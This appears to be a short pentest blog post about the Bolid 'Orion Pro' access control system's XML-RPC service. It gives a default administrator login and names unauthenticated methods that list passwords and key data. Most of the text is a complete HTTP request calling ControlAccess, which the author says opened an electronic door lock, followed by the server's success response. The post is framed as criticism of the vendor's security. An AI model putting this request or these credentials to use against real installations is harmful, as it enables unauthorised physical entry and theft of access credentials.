Once during a pentest on one of the hosts on WI-FI network I discovered a lot of open ports (XML-RPC).

The server kindly answered the garbage I had send:

BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10

A bit of googling and I find out that this is an access control system АРМ «Орион Про» of security company ЗАО НВП «Болид».

After reading the documentation I tried the ADMINISTRATOR:ORION on XML-RPC. Success. You can manage the system and the database. But this story is not about that.

What if there was a strong password?

In such an unimaginable case you could use XML-RPC methods that do not require authentication. For example, GetPasswordListWithStatus, GetKeyFullInformation, GetDeviceListAsync, ControlAccess, etc.

If you want you may open the door via request:

GET / HTTP/1.1
Host: x.x.x.x:8080
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,ru-RU;q=0.9,en;q=0.8,en-US;q=0.7
Connection: close
Content-Type: application/xml
Content-Length: 1467

<?xml version="1.0" encoding="windows-1251"?>
<methodCall>
  <methodName>ControlAccess</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>ComPort</name>
            <value>
              <int>3</int>
            </value>
          </member>
          <member>
            <name>PKUAddress</name>
            <value>
              <int>0</int>
            </value>
          </member>
          <member>
            <name>DeviceAddress</name>
            <value>
              <int>5</int>
            </value>
          </member>
          <member>
            <name>AggregateAddress</name>
            <value>
              <int>1</int>
            </value>
          </member>
          <member>
            <name>Command</name>
            <value>
              <int>7</int>
            </value>
          </member>
          <member>
            <name>MethodNameForAnswer</name>
            <value>
              <string>Result</string>
            </value>
          </member>
          <member>
            <name>IPSERVER</name>
            <value>
              <string>y.y.y.y</string>
            </value>
          </member>
          <member>
            <name>PORTSERVER</name>
            <value>
              <int>7777</int>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Viola! Electronic lock is opened!

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 298
Content-Type: text/xml
Content-MD5: 5si9s8913Zio3EUFMy7mww==
Server:  BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10

<?xml version="1.0" encoding="Windows-1251" ?>
<methodResponse>
   <params>
   <param>
<value>
  <struct>
    <member>
      <name>Result</name>
      <value><boolean>1</boolean></value>
    </member>
  </struct>
</value>
   </param>
   </params>
</methodResponse>

The company believes that authentication is not required in access control software. Why do we need such security products?